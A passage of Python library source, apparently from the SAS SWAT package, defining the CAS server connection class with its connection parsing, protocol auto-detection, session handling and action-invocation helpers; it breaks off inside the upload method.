User-definable name for the session.
nworkers : int or long, optional
Number of worker nodes to use.
authinfo : string or list-of-strings, optional
The filename or list of filenames of authinfo/netrc files used
for authentication.
protocol : string, optional
The protocol to use for communicating with the server.
This protocol must match the protocol spoken by the specified
server port. If the first parameter is a URL, that protocol will
be used.
path : string, optional
Base path of URL when using the REST protocol.
ssl_ca_list : string, optional
The path to the SSL certificates for the CAS server.
**kwargs : any, optional
Arbitrary keyword arguments used for internal purposes only.
Raises
------
IOError
When a connection can not be established.
Returns
-------
:class:`CAS` object
Examples
--------
To create a connection to a CAS host, you simply supply a hostname
(or list of hostnames), a port number, and user credentials. Here is
an example specifying a single hostname, and username and password as
strings.
>>> conn = swat.CAS('mycashost.com', 5570, 'username', 'password')
If you use an authinfo file and it is in your home directory, you don't
have to specify any username or password. You can override the authinfo
file location with the authinfo= parameter. This form also works for
Kerberos authentication.
>>> conn = swat.CAS('mycashost.com', 5570)
If you specify multiple hostnames, it will connect to the first available
server in the list.
>>> conn = swat.CAS(['mycashost1.com', 'mycashost2.com', 'mycashost3.com'],
5570, 'username', 'password')
URLs can also be used for both binary and REST protocols. Notice that
you need to specify the username= and password= keywords since the
port number is skipped.
>>> conn = swat.CAS('cas://mycashost1.com:5570',
... username='username', password='password')
>>> conn = swat.CAS('http://mycashost1.com:80',
... username='username', password='password')
To connect to an existing CAS session, you specify the session identifier.
>>> conn = swat.CAS('mycashost.com', 5570,
... session='ABCDEF12-ABCD-EFG1-2345-ABCDEF123456')
If you wish to change the locale used on the server, you can use the
locale= option.
>>> conn = swat.CAS('mycashost.com', 5570, locale='es_US')
To limit the number of worker nodes in a grid, you use the nworkers=
parameter.
>>> conn = swat.CAS('mycashost.com', 5570, nworkers=4)
'''
trait_names = None # Block IPython's query for this
sessions = weakref.WeakValueDictionary()
_sessioncount = 1
@classmethod
def _expand_url(cls, url):
''' Expand [...] groups in URL to all linear combinations '''
if not isinstance(url, items_types):
url = [url]
out = []
for item in url:
parts = [x for x in re.split(r'(?:\[|\])', item) if x]
for i, part in enumerate(parts):
if ',' in part:
parts[i] = re.split(r'\s*,\s*', part)
# elif re.match(r'^\d+\-\d+$', part):
# start, end = part.split('-')
# width = len(start)
# start = int(start)
# end = int(end)
# parts[i] = [('%%0%sd' % width) % x for x in range(start, end+1)]
else:
parts[i] = [part]
out += list(''.join(x) for x in itertools.product(*parts))
return out
@classmethod
def _get_connection_info(cls, hostname, port, username, password, protocol, path):
''' Distill connection information from parameters, config, and environment '''
# Get defaults from config, if needed
username = username or cf.get_option('cas.username')
password = password or cf.get_option('cas.token')
protocol = protocol or cf.get_option('cas.protocol')
hostname = hostname or cf.get_option('cas.hostname')
port = port or cf.get_option('cas.port')
logger.debug('Connection info: hostname=%s port=%s protocol=%s '
'username=%s password=%s path=%s',
hostname, port, protocol, username, password, path)
# Always make hostname a list
if not isinstance(hostname, items_types):
hostname = re.split(r'\s+', re.sub(r'\s*,\s*', r',', hostname.strip()))
else:
hostname = [re.sub(r'\s*,\s*', r',', x.strip()) for x in hostname]
# Check hostname for other components
new_hostname = []
for name in hostname:
if not re.match(r'^\w+://', hostname[0]):
new_hostname.append('%s://%s' % (protocol, name))
else:
new_hostname.append(name)
hostname = cls._expand_url(new_hostname)
urlp = urlparse(hostname[0])
protocol = urlp.scheme or protocol
hostname = [urlparse(x).hostname for x in hostname]
port = urlp.port or port
username = urlp.username or username
password = urlp.password or password
path = urlp.path or path
# Set port based on protocol, if port number is missing
if not port:
if protocol == 'http':
port = 80
elif protocol == 'https':
port = 443
elif protocol == 'cas':
port = 5570
else:
raise SWATError('Port number was not specified')
# Auto-detect protocol if still missing
if protocol == 'auto':
protocol = cls._detect_protocol(hostname, port, protocol=protocol)
if protocol not in ['http', 'https', 'cas']:
raise SWATError('Unrecognized protocol: %s' % protocol)
# For http(s), construct URLs
if protocol.startswith('http'):
urls = []
for name in hostname:
url = '%s://%s:%s' % (protocol, name, port)
if path:
url = '%s/%s' % (url, re.sub(r'^/+', r'', path))
urls.append(url)
hostname = ' '.join(urls)
logger.debug('Distilled connection parameters: '
"url='%s' username=%s", urls, username)
else:
hostname = ' '.join(hostname)
logger.debug('Distilled connection parameters: '
"hostname='%s' port=%s, username=%s, protocol=%s",
hostname, port, username, protocol)
return a2n(hostname), int(port), a2n(username), a2n(password), a2n(protocol)
def __init__(self, hostname=None, port=None, username=None, password=None,
session=None, locale=None, nworkers=None, name=None,
authinfo=None, protocol=None, path=None, ssl_ca_list=None,
**kwargs):
# Filter session options allowed as parameters
_kwargs = {}
sess_opts = {}
for k, v in kwargs.items():
if k.lower() in ['caslib', 'metrics', 'timeout', 'timezone']:
sess_opts[k] = v
else:
_kwargs[k] = v
kwargs = _kwargs
# Check for unknown connection parameters
unknown_keys = [k for k in kwargs if k not in ['prototype']]
if unknown_keys:
warnings.warn('Unrecognized keys in connection parameters: %s' %
', '.join(unknown_keys))
# If a prototype exists, use it for the connection config
prototype = kwargs.get('prototype')
if prototype is not None:
soptions = a2n(prototype._soptions)
protocol = a2n(prototype._protocol)
else:
# Distill connection information from parameters, config, and environment
hostname, port, username, password, protocol = \
self._get_connection_info(hostname, port, username,
password, protocol, path)
soptions = a2n(getsoptions(session=session, locale=locale,
nworkers=nworkers, protocol=protocol))
# Check for SSL certificate
if ssl_ca_list is None:
ssl_ca_list = cf.get_option('cas.ssl_ca_list')
if ssl_ca_list:
logger.debug('Using certificate file: %s', ssl_ca_list)
os.environ['CAS_CLIENT_SSL_CA_LIST'] = ssl_ca_list
# Check for explicitly specified authinfo files
if authinfo is not None:
if not any_file_exists(authinfo):
if not isinstance(authinfo, items_types):
authinfo = [authinfo]
raise OSError('None of the specified authinfo files from'
'list exist: %s' % ', '.join(authinfo))
# Create error handler
try:
if protocol in ['http', 'https']:
self._sw_error = rest.REST_CASError(soptions)
else:
self._sw_error = clib.SW_CASError(soptions)
except SystemError:
raise SWATError('Could not create CAS error handler object. '
'Check your SAS TK path setting.')
# Make the connection
try:
# Make a copy of the prototype connection
if prototype is not None:
self._sw_connection = errorcheck(prototype._sw_connection.copy(),
prototype._sw_connection)
# Create a new connection
else:
# Set up authinfo paths
if authinfo is not None and password is None:
password = ''
if not isinstance(authinfo, items_types):
authinfo = [authinfo]
for item in authinfo:
password += '{%s}' % item
password = 'authinfo={%s}' % password
# Set up connection parameters
params = (hostname, port, username, password, soptions, self._sw_error)
if protocol in ['http', 'https']:
self._sw_connection = rest.REST_CASConnection(*params)
else:
self._sw_connection = clib.SW_CASConnection(*params)
# If we don't have a connection, bail out.
if self._sw_connection is None:
raise SystemError
except SystemError:
raise SWATError(self._sw_error.getLastErrorMessage())
# Set up index origin for error messages
errorcheck(self._sw_connection.setZeroIndexedParameters(), self._sw_connection)
# Get instance structure values from connection layer
self._hostname = errorcheck(
a2u(self._sw_connection.getHostname(), 'utf-8'), self._sw_connection)
self._port = errorcheck(self._sw_connection.getPort(), self._sw_connection)
self._username = errorcheck(
a2u(self._sw_connection.getUsername(), 'utf-8'), self._sw_connection)
self._session = errorcheck(
a2u(self._sw_connection.getSession(), 'utf-8'), self._sw_connection)
self._soptions = errorcheck(
a2u(self._sw_connection.getSOptions(), 'utf-8'), self._sw_connection)
self._protocol = protocol
if name:
self._name = a2u(name)
else:
self._name = 'py-session-%d' % type(self)._sessioncount
type(self)._sessioncount = type(self)._sessioncount + 1
# Caches for action classes and reflection information
self._action_classes = {}
self._action_info = {}
self._actionset_classes = {}
self._actionset_info = {}
# Dictionary of result hook functions
self._results_hooks = {}
# Get server attributes
(self.server_type,
self.server_version,
self.server_features) = self._get_server_features()
# Preload __dir__ information. It will be extended later with action names
self._dir = set([x for x in super_dir(CAS, self)])
# Pre-populate action set attributes
for asname, value in self._raw_retrieve('builtins.help',
showhidden=True,
_messagelevel='error',
_apptag='UI').items():
self._actionset_classes[asname.lower()] = None
if value is not None:
for actname in value['name']:
self._action_classes[asname.lower() + '.' + actname.lower()] = None
self._action_classes[actname.lower()] = None
# Populate CASTable documentation and method signatures
CASTable._bootstrap(self)
init = CASTable.__init__
if hasattr(init, '__func__'):
init = init.__func__
self.CASTable.__func__.__doc__ = init.__doc__
# Add loadactionset handler to populate actionset and action classes
def handle_loadactionset(conn, results):
''' Force the creation of actionset and action classes '''
if 'actionset' in results:
conn.__getattr__(results['actionset'], atype='actionset')
self.add_results_hook('builtins.loadactionset', handle_loadactionset)
# Set the session name
self._raw_retrieve('session.sessionname', name=self._name,
_messagelevel='error', _apptag='UI')
# Set session options
if sess_opts:
self._raw_retrieve('sessionprop.setsessopt', _messagelevel='error',
_apptag='UI', **sess_opts)
# Set options
self._set_option(print_messages=cf.get_option('cas.print_messages'))
self._set_option(trace_actions=cf.get_option('cas.trace_actions'))
self._set_option(trace_ui_actions=cf.get_option('cas.trace_ui_actions'))
# Add the connection to a global dictionary for use by IPython notebook
type(self).sessions[self._session] = self
type(self).sessions[self._name] = self
def _id_generator():
''' Generate unique IDs within a connection '''
num = 0
while True:
yield num
num = num + 1
self._id_generator = _id_generator()
def _gen_id(self):
''' Generate an ID unique to the session '''
import numpy
return numpy.base_repr(next(self._id_generator), 36)
def _get_server_features(self):
'''
Determine which features are available in the server
Returns
-------
set-of-strings
'''
out = set()
info = self._raw_retrieve('builtins.serverstatus', _messagelevel='error',
_apptag='UI')
version = tuple([int(x) for x in info['About']['Version'].split('.')][:2])
stype = info['About']['System']['OS Name'].lower()
# Check for reflection levels feature
res = self._raw_retrieve('builtins.reflect', _messagelevel='error',
_apptag='UI', action='builtins.reflect',
showlabels=False)
if [x for x in res[0]['actions'][0]['params'] if x['name'] == 'levels']:
out.add('reflection-levels')
return stype, version, out
@classmethod
def _detect_protocol(cls, hostname, port, protocol=None, timeout=3):
'''
Detect the protocol type for the given host and port
Parameters
----------
hostname : string or list
The CAS host to connect to.
port : int
The CAS port to connect to.
protocol : string, optional
The protocol override value.
timeout : int, optional
Timeout (in seconds) for checking a protocol
Returns
-------
string
'cas', 'http', or 'https'
'''
if protocol is None:
protocol = cf.get_option('cas.protocol')
if isinstance(hostname, six.string_types):
hostname = re.split(r'\s+', hostname.strip())
if protocol != 'auto':
logger.debug('Protocol specified explicitly: %s' % protocol)
# Try to detect the proper protocol
if protocol == 'auto':
try:
import queue
except ImportError:
import Queue as queue
import socket
import ssl
import threading
for host in hostname:
out = queue.Queue()
logger.debug('Attempting protocol auto-detect on %s:%s', host, port)
def check_cas_protocol():
''' Test port for CAS (binary) support '''
proto = None
try:
cas_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
cas_socket.settimeout(timeout)
cas_socket.connect((host, port))
cas_socket.sendall(bytearray([0, 0x53, 0x41, 0x43,
0x10, 0, 0, 0, 0, 0, 0, 0,
0x10, 0, 0, 0,
0, 0, 0, 0,
2, 0, 0, 0,
5, 0, 0, 0]))
if cas_socket.recv(4) == b'\x00SAC':
proto = 'cas'
except Exception:
pass
finally:
cas_socket.close()
out.put(proto)
def check_https_protocol():
''' Test port for HTTPS support '''
proto = None
try:
ssl_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_socket.settimeout(timeout)
ssl_context = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
ssl_conn = ssl_context.wrap_socket(ssl_socket,
server_hostname=host)
ssl_conn.connect((host, port))
ssl_conn.write(('GET /cas HTTP/1.1\r\n'
+ ('Host: %s\r\n' % host)
+ 'Connection: close\r\n'
+ 'User-Agent: Python-SWAT\r\n'
+ 'Cache-Control: no-cache\r\n\r\n')
.encode('utf8'))
except ssl.SSLError as exc:
if 'certificate verify failed' in str(exc):
proto = 'https'
except Exception:
pass
finally:
ssl_socket.close()
out.put(proto)
def check_http_protocol():
''' Test port for HTTP support '''
proto = None
try:
http_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
http_socket.settimeout(timeout)
http_socket.connect((host, port))
http_socket.send(('GET /cas HTTP/1.1\r\n'
+ ('Host: %s\r\n' % host)
+ 'Connection: close\r\n'
+ 'User-Agent: Python-SWAT\r\n'
+ 'Cache-Control: no-cache\r\n\r\n')
.encode('utf8'))
txt = http_socket.recv(16).decode('utf-8').lower()
if txt.startswith('http') and txt.split()[1] != '400':
proto = 'http'
except Exception:
pass
finally:
http_socket.close()
out.put(proto)
checkers = [check_cas_protocol, check_https_protocol, check_http_protocol]
for item in checkers:
threading.Thread(target=item).start()
try:
for i in range(len(checkers)):
proto = out.get(block=True, timeout=timeout)
if proto is not None:
protocol = proto
break
except queue.Empty:
pass
if protocol != 'auto':
logger.debug('Protocol detected: %s', protocol)
break
# No protocol detected
if protocol == 'auto':
if port == 80:
logger.debug('Protocol defaulted by port 80: http')
protocol = 'http'
elif port == 443:
logger.debug('Protocol defaulted by port 443: http')
protocol = 'https'
else:
logger.debug('No protocol detected: defaulting to \'cas\'')
protocol = 'cas'
return protocol
def __enter__(self):
''' Enter a context '''
return self
def __exit__(self, type, value, traceback):
''' Exit the context '''
self.retrieve('session.endsession', _apptag='UI', _messagelevel='error')
self.close()
@contextlib.contextmanager
def session_context(self, *args, **kwargs):
'''
Create a context of session options
This method is intended to be used in conjunction with Python's
``with`` statement. It allows you to set CAS session options within
that context, then revert them back to their previous state.
For all possible session options, see the `sessionprop.getsessopt`
CAS action documentation.
Parameters
----------
*args : string / any pairs
Name / value pairs of options in consecutive arguments, name / value
pairs in tuples, or dictionaries.
**kwargs : string / any pairs
Key / value pairs of session options
Examples
--------
>>> conn = swat.CAS()
>>> print(conn.getsessopt('locale').locale)
en_US
>>> with conn.session_context(locale='fr'):
... print(conn.getsessopt('locale').locale)
fr
>>> print(conn.getsessopt('locale').locale)
en_US
'''
state = {}
newkwargs = {}
for key, value in iteroptions(*args, **kwargs):
state[key.lower()] = list(self.retrieve('sessionprop.getsessopt',
_messagelevel='error',
_apptag='UI',
name=key.lower()).values())[0]
newkwargs[key.lower()] = value
self.retrieve('sessionprop.setsessopt', _messagelevel='error',
_apptag='UI', **newkwargs)
yield
self.retrieve('sessionprop.setsessopt', _messagelevel='error',
_apptag='UI', **state)
def get_action_names(self):
'''
Return the list of action classes
Returns
-------
list of strings
'''
return self._action_classes.keys()
def get_actionset_names(self):
'''
Return the list of actionset classes
Returns
-------
list of strings
'''
return self._actionset_classes.keys()
def has_action(self, name):
'''
Does the given action name exist?
Parameters
----------
name : string
The name of the CAS action to look for.
Returns
-------
boolean
'''
return name.lower() in self._action_classes
def has_actionset(self, name):
'''
Does the given actionset name exist?
Parameters
----------
name : string
The name of the CAS action set to look for.
Returns
-------
boolean
'''
return name.lower() in self._actionset_classes
def get_action(self, name):
'''
Get the CAS action instance for the given action name
Parameters
----------
name : string
The name of the CAS action to look for.
Returns
-------
:class:`CASAction` object
'''
return self.__getattr__(name, atype='action')
def get_action_class(self, name):
'''
Get the CAS action class for the given action name
Parameters
----------
name : string
The name of the CAS action to look for.
Returns
-------
:class:`CASAction`
'''
return self.__getattr__(name, atype='action_class')
def get_actionset(self, name):
'''
Get the CAS action set instance for the given action set name
Parameters
----------
name : string
The name of the CAS action set to look for.
Returns
-------
:class:`CASActionSet` object
'''
return self.__getattr__(name, atype='actionset')
def __dir__(self):
# Short-circuit PyCharm's introspection
if 'get_names' in [x[3] for x in inspect.stack()]:
return list(self._dir)
return list(sorted(list(self._dir) + list(self.get_action_names())))
def __dir_actions__(self):
return list(sorted(self.get_action_names()))
def __dir_members__(self):
return list(sorted(self._dir))
def __str__(self):
args = []
args.append(repr(self._hostname))
args.append(repr(self._port))
if self._username:
args.append(repr(self._username))
return 'CAS(%s, protocol=%s, name=%s, session=%s)' % (', '.join(args),
repr(self._protocol),
repr(self._name),
repr(self._session))
def __repr__(self):
return str(self)
def CASTable(self, name, **kwargs):
'''
Create a CASTable instance
The primary difference between constructing a :class:`CASTable`
object through this method rather than directly, is that the
current session will be automatically registered with the
:class:`CASTable` object so that CAS actions can be called on
it directly.
Parameters
----------
name : string
Name of the table in CAS.
**kwargs : any, optional
Arbitrary keyword arguments. These keyword arguments are
passed to the :class:`CASTable` constructor.
Returns
-------
:class:`CASTable` object
'''
table = CASTable(name, **kwargs)
table.set_connection(self)
return table
def SASFormatter(self):
'''
Create a SASFormatter instance
:class:`SASFormatters` can be used to format Python values using
SAS data formats.
Returns
-------
:class:`SASFormatter` object
'''
return SASFormatter(soptions=self._soptions)
def add_results_hook(self, name, func):
'''
Add a post-processing function for results
The function will be called with two arguments: the CAS connection
object and the :class:`CASResult` object.
Parameters
----------
name : string
Full name of action (actionset.actionname)
func : function
Function to call for result set
See Also
--------
:meth:`del_results_hook`
:meth:`del_results_hooks`
Examples
--------
To add a post-processing function for a particular action, you
specify the fully-qualified action name and a function.
>>> def myfunc(connection, results):
if results and results.get('num'):
results['num'] = math.abs(results['num'])
return results
>>>
>>> s.add_results_hook('myactionset.myaction', myfunc)
'''
name = name.lower()
if name not in self._results_hooks:
self._results_hooks[name] = []
self._results_hooks[name].append(func)
def del_results_hook(self, name, func):
'''
Delete a post-processing function for an action
Parameters
----------
name : string
Full name of action (actionset.actionname)
func : function
The function to remove
See Also
--------
:meth:`add_results_hook`
:meth:`del_results_hooks`
Examples
--------
To remove a post-processing hook from an action, you must specify the
action name as well as the function to remove. This is due to the fact
that multiple functions can be registered to a particular action.
>>> s.del_results_hook('myactionset.myaction', myfunc)
'''
name = name.lower()
if name in self._results_hooks:
self._results_hooks[name] = [x for x in self._results_hooks[name]
if x is not func]
def del_results_hooks(self, name):
'''
Delete all post-processing functions for an action
Parameters
---------
name : string
Full name of action (actionset.actionname)
See Also
--------
:meth:`add_results_hook`
:meth:`del_results_hook`
Examples
--------
The following code removes all post-processing functions registered to
the `myactionset.myaction` action.
>>> s.del_results_hooks('myactionset.myaction')
'''
name = name.lower()
if name in self._results_hooks:
del self._results_hooks[name]
def close(self, close_session=False):
''' Close the CAS connection '''
if close_session:
self.retrieve('session.endsession', _messagelevel='error', _apptag='UI')
errorcheck(self._sw_connection.close(), self._sw_connection)
def terminate(self):
''' End the session and close the CAS connection '''
self.close(close_session=True)
def _set_option(self, **kwargs):
'''
Set connection options
Parameters
---------
**kwargs : any
Arbitrary keyword arguments. Each key/value pair will be
set as a connection option.
Returns
-------
True
If all options were set successfully
'''
for name, value in six.iteritems(kwargs):
name = str(name)
typ = errorcheck(self._sw_connection.getOptionType(name),
self._sw_connection)
try:
if typ == 'boolean':
if value in [True, False, 1, 0]:
errorcheck(self._sw_connection.setBooleanOption(name,
value and 1 or 0),
self._sw_connection)
else:
raise SWATError('%s is not a valid boolean value' % value)
elif typ == 'string':
if isinstance(value, (binary_types, text_types)):
errorcheck(self._sw_connection.setStringOption(name, a2n(value)),
self._sw_connection)
else:
errorcheck(self._sw_connection.setStringOption(name, value),
self._sw_connection)
elif typ == 'int32':
errorcheck(self._sw_connection.setInt32Option(name, int32(value)),
self._sw_connection)
elif typ == 'int64':
errorcheck(self._sw_connection.setInt64Option(name, int64(value)),
self._sw_connection)
elif typ == 'double':
errorcheck(self._sw_connection.setDoubleOption(name, float64(value)),
self._sw_connection)
except TypeError:
raise SWATError('%s is not the correct type' % value)
return True
def copy(self):
'''
Create a copy of the connection
The copy of the connection will use the same parameters as ``self``,
but it will create a new session.
Examples
--------
>>> conn = swat.CAS()
>>> print(conn)
CAS(..., session='76dd2bbe-de65-554f-a94f-a5e0e1abfdc8')
>>> conn2 = conn.copy()
>>> print(conn2)
CAS(..., session='19cef586-6997-ae40-b62c-036f44cb60fc')
See Also
--------
:meth:`fork`
Returns
-------
:class:`CAS` object
'''
return type(self)(None, None, prototype=self)
def fork(self, num=2):
'''
Create multiple copies of a connection
The copies of the connection will use the same parameters as ``self``,
but each will create a new session.
Notes
-----
The first element in the returned list is the same object that
the method was called on. You only get `num`-1 copies.
Parameters
----------
num : int, optional
Number of returned connections. The first element of the returned
list is always the object that the fork method was called on.
Examples
--------
The code below demonstrates how to get four unique connections.
>>> conn = swat.CAS()
>>> c1, c2, c3, c4 = conn.fork(4)
>>> c1 is conn
True
>>> c2 is conn
False
See Also
--------
:meth:`copy`
Returns
-------
list of :class:`CAS` objects
'''
output = [self]
for i in range(1, num):
output.append(self.copy())
return output
def _invoke_without_signature(self, _name_, **kwargs):
'''
Call an action on the server
Parameters
----------
_name_ : string
Name of the action.
**kwargs : any, optional
Arbitrary keyword arguments.
Returns
-------
:obj:`self`
'''
if isinstance(self._sw_connection, rest.REST_CASConnection):
errorcheck(self._sw_connection.invoke(a2n(_name_), kwargs),
self._sw_connection)
else:
errorcheck(self._sw_connection.invoke(a2n(_name_),
py2cas(self._soptions,
self._sw_error, **kwargs)),
self._sw_connection)
return self
def _merge_param_args(self, parmlist, kwargs, action=None):
'''
Merge keyword arguments into a parmlist
This method modifies the parmlist *in place*.
Parameters
----------
parmlist : list
Parameter list.
kwargs : dict
Dictionary of keyword arguments.
action : string
Name of the action.
'''
if action is None:
action = ''
if isinstance(kwargs, ParamManager):
kwargs = copy.deepcopy(kwargs.params)
# Short circuit if we can
if not isinstance(kwargs, dict):
return
# See if we have a caslib= parameter
caslib = False
for param in parmlist:
if param['name'] == 'caslib':
caslib = True
break
# kwargs preserving case
casekeys = {k.lower(): k for k in kwargs.keys()}
# Add support for CASTable objects
inputs = None
fetch = {}
uses_inputs = False
uses_fetchvars = False
for param in parmlist:
ptype = param['parmType']
key = param['name']
key = casekeys.get(key, key)
key_lower = key.lower()
# Check for inputs= / fetchvars= parameters
if ptype == 'value_list':
if key_lower == 'inputs':
uses_inputs = True
elif key_lower == 'fetchvars':
uses_fetchvars = True
# Get table object if it exists
tbl = kwargs.get('__table__', None)
# Convert table objects to the proper form based on the argument type
if key in kwargs and isinstance(kwargs[key], CASTable):
if param.get('isTableDef'):
inputs = kwargs[key].get_inputs_param()
fetch = kwargs[key].get_fetch_params()
kwargs[key] = kwargs[key].to_table_params()
elif param.get('isTableName'):
inputs = kwargs[key].get_inputs_param()
fetch = kwargs[key].get_fetch_params()
# Fill in caslib= first
if caslib and 'caslib' not in kwargs and \
kwargs[key].has_param('caslib'):
kwargs['caslib'] = kwargs[key].get_param('caslib')
kwargs[key] = kwargs[key].to_table_name()
elif param.get('isOutTableDef'):
kwargs[key] = kwargs[key].to_outtable_params()
elif param.get('isCasLib') and kwargs[key].has_param('caslib'):
kwargs[key] = kwargs[key].get_param('caslib')
# If a string is given for a table object, convert it to a table object
elif key in kwargs and isinstance(kwargs[key], text_types) and \
param.get('isTableDef'):
kwargs[key] = {'name': kwargs[key]}
elif tbl is not None and param.get('isTableDef') and \
key_lower == 'table' and 'table' not in casekeys:
inputs = tbl.get_inputs_param()
fetch = tbl.get_fetch_params()
kwargs[key] = tbl.to_table_params()
elif tbl is not None and param.get('isTableName') and \
key_lower == 'name' and 'name' not in casekeys:
inputs = tbl.get_inputs_param()
fetch = tbl.get_fetch_params()
if caslib and 'caslib' not in kwargs and tbl.has_param('caslib'):
kwargs['caslib'] = tbl.get_param('caslib')
kwargs[key] = tbl.to_table_name()
# Workaround for columninfo / update which doesn't define table= as
# a table definition.
elif tbl is not None and key_lower == 'table' and \
action.lower() in ['columninfo', 'table.columninfo',
'update', 'table.update'] and \
'table' not in casekeys:
inputs = tbl.get_inputs_param()
kwargs[key] = tbl.to_table_params()
if not uses_inputs:
if inputs and 'vars' not in kwargs:
kwargs[key]['vars'] = inputs
inputs = None
# Apply input variables
if uses_inputs and inputs and 'inputs' not in kwargs:
kwargs['inputs'] = inputs
elif uses_fetchvars and inputs and 'fetchvars' not in kwargs:
kwargs['fetchvars'] = inputs
# Apply fetch parameters
if fetch and action.lower() in ['fetch', 'table.fetch']:
for key, value in fetch.items():
if key in kwargs:
continue
if key == 'sortby' and ('orderby' in kwargs or 'orderBy' in kwargs):
continue
kwargs[key] = value
# Apply inputs= to specific actions that don't support it
if 'table' in kwargs and not uses_inputs and inputs \
and action.lower() in ['partition', 'table.partition',
'save', 'table.save']:
tbl = kwargs['table']
if not isinstance(tbl, dict):
tbl = dict(name=tbl)
tbl['vars'] = inputs
# Fix aggregate action when both inputs= and varspecs= are supplied
if 'table' in kwargs and action.lower() in ['aggregate', 'aggregation.aggregate']:
if 'inputs' in kwargs and 'varspecs' in kwargs:
kwargs.pop('inputs', None)
kwargs.pop('__table__', None)
# Workaround for tableinfo which aliases table= to name=, but
# the alias is hidden.
if action.lower() in ['tableinfo', 'table.tableinfo'] and 'table' in kwargs:
if isinstance(kwargs['table'], CASTable):
kwargs['table'] = kwargs['table'].to_table_params()
if isinstance(kwargs['table'], dict):
if caslib and 'caslib' not in kwargs and kwargs['table'].get('caslib'):
kwargs['caslib'] = kwargs['table']['caslib']
kwargs['table'] = kwargs['table']['name']
# Add current value fields in the signature
for param in parmlist:
if param['name'] in kwargs:
if 'parmList' in param:
self._merge_param_args(param['parmList'], kwargs[param['name']],
action=action)
else:
if isinstance(kwargs[param['name']], text_types):
param['value'] = kwargs[param['name']].replace('"', '\\u0022')
# TODO: This should only happen for binary inputs (i.e., never)
elif isinstance(kwargs[param['name']], binary_types):
# param['value'] = kwargs[param['name']].replace('"', '\\u0022')
pass
else:
param['value'] = kwargs[param['name']]
def _get_action_params(self, name, kwargs):
'''
Get additional parameters associated with the given action
Parameters
----------
name : string
Name of the action being executed.
kwargs : dict
Action parameter dictionary.
Returns
-------
dict
The new set of action parameters.
'''
newkwargs = kwargs.copy()
for value in six.itervalues(kwargs):
if isinstance(value, ActionParamManager):
newkwargs.update(value.get_action_params(name, {}))
return newkwargs
def _invoke_with_signature(self, _name_, **kwargs):
'''
Call an action on the server
Parameters
----------
_name_ : string
Name of the action.
**kwargs : any, optional
Arbitrary keyword arguments.
Returns
-------
dict
Signature of the action
'''
# Get the signature of the action
signature = self._get_action_info(_name_)[-1]
# Check for additional action parameters
kwargs = self._get_action_params(_name_, kwargs)
if signature:
signature = copy.deepcopy(signature)
kwargs = copy.deepcopy(kwargs)
self._merge_param_args(signature.get('params', {}), kwargs, action=_name_)
self._invoke_without_signature(_name_, **kwargs)
return signature
def _extract_dtypes(self, df):
'''
Extract importoptions= style data types from the DataFrame
Parameters
----------
df : pandas.DataFrame
The DataFrame to get types from
format : string, optional
The output format: dict or list
Returns
-------
OrderedDict
'''
out = collections.OrderedDict()
for key, value in df.dtypes.iteritems():
value = value.name
if value == 'object':
value = 'varchar'
elif value.startswith('float'):
value = 'double'
elif value.endswith('int64'):
if 'csv-ints' in self.server_features:
value = 'int64'
else:
value = 'double'
elif value.startswith('int'):
if 'csv-ints' in self.server_features:
value = 'int32'
else:
value = 'double'
elif value.startswith('bool'):
if 'csv-ints' in self.server_features:
value = 'int32'
else:
value = 'double'
elif value.startswith('datetime'):
value = 'varchar'
else:
continue
out['%s' % key] = dict(type=value)
return out
def _apply_importoptions_vars(self, importoptions, df_dtypes):
'''
Merge in vars= parameters to importoptions=
Notes
-----
This method modifies the importoptions in-place.
Parameters
----------
importoptions : dict
The importoptions= parameter
df_dtypes : dict or list
The DataFrame data types dictionary
'''
if 'vars' not in importoptions:
importoptions['vars'] = df_dtypes
return
vars = importoptions['vars']
# Merge options into dict vars
if isinstance(vars, dict_types):
for key, value in six.iteritems(df_dtypes):
if key in vars:
for k, v in six.iteritems(value):
vars[key].setdefault(k, v)
else:
vars[key] = value
# Merge options into list vars
else:
df_dtypes_list = []
for key, value in six.iteritems(df_dtypes):
value = dict(value)
value['name'] = key
df_dtypes_list.append(value)
for i, item in enumerate(df_dtypes_list):
if i < len(vars):
if not vars[i]:
vars[i] = item
else:
for key, value in six.iteritems(item):
vars[i].setdefault(key, value)
else:
vars.append(item)
def upload(self, data, importoptions=None, casout=None, date_format=None, **kwargs):
'''
Upload data from a local file into a CAS table
The primary difference between this data loader and the other data
loaders on this class is that, in this case, the parsing of the data
is done on the server. This method simply uploads the file as
binary data which is then parsed by `table.loadtable` on the server.
While the server parsers may not be quite a flexible as Python, they
are generally much faster. Files such as CSV can be parsed on the
server in multiple threads across many machines in the grid.
Notes
-----
This method uses paths that are on the **client side**. This means
you need to use paths to files that are **on the same machine that Python
is running on**. If you want to load files from the CAS server side, you
would use the `table.loadtable` action.
Also, when uploading a :class:`pandas.DataFrame`, the data is exported to
a CSV file, then the CSV file is uploaded. This can cause a loss of
metadata about the columns since the server parser will guess at the
data types of the columns. You can use `importoptions=` to specify more
information about the data.
Parameters
----------
data : string or :class:`pandas.DataFrame`
If the value is a string, it can be either a filename
or a URL. DataFrames will be converted to CSV before
uploading.
importoptions : dict, optional
Import options for the ``table.loadtable`` action.
casout : dict, optional
Output table definition for the ``table.loadtable`` action.
date_format : string, optional
Format string for datetime objects.
**kwargs : keyword arguments, optional
Additional parameters to the ``table.loadtable`` action.
Examples
--------
>>> conn = swat.CAS()
>>> out = conn.upload('data/iris.csv')
>>> tbl = out.casTable
>>> print(tbl.head())
sepal_length sepal_width petal_length petal_width species
0 5.1 3.5 1.4 0.2 setosa
1 4.9 3.0 1.4 0.2 setosa
2 4.7 3.2 1.3 0.2 setosa
3 4.6 3.1 1.5 0.2 setosa
4 5.0 3.6 1.4 0.2 setosa
Returns
-------
:class:`CASResults`
'''
delete = False
name = None
df_dtypes = None
for key, value in list(kwargs.items()):
if importoptions is None and key.lower() == 'importoptions':
importoptions = value
del kwargs[key]
elif casout is None and key.lower() == 'casout':
casout = value
del kwargs[key]
if importoptions is None:
importoptions = {}
import pandas as pd
if isinstance(data, pd.DataFrame):
import tempfile
with tempfile.NamedTemporaryFile(delete=False, suffix='.csv') as tmp:
delete = True
filename = tmp.name
name = os.path.splitext(os.path.basename(filename))[0]
data.to_csv(filename, encoding='utf-8',
index=False, sep=a2n(',', 'utf-8'),
decimal=a2n('.', 'utf-8'),
date_format=a2n(date_format, 'utf-8'),
line_terminator=a2n('\r\n', 'utf-8'))
